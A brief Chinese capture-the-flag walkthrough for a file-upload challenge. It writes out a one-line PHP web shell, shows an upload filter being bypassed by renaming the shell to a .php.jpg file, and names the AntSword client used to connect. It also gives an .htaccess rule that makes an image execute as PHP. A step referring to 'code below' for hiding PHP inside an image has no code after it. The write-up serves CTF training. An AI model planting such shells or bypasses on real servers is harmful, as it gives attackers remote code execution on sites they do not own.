解题步骤：

1.新建一个php文件，编写内容：

<?php eval($_REQUEST[123]) ?> 

2.将编写好的php文件上传，但是发现被阻止，网站只能上传图片文件。

3.解决方法：

将php文件改为图片文件（例如：将aa.php  改为 aa.php.jpg)，上传；

4.将修改好的文件重新上传，复制图片地址。

5.打开蚁剑工具，将链接粘贴到指定位置，开始破解。

6.获取对应的flag

PS：为了能够添加php文件，还可以将php文件挂载到图片上（例如：找一张jpg图片，然后运行下面代码，重新生成一张图片）;然后再上传一个.htaccess文件,其代码如下：

<FilesMatch "test.jpg">  # 图片名改为要上传的图片名
SetHandler application/x-httpd-php
</FilesMatch>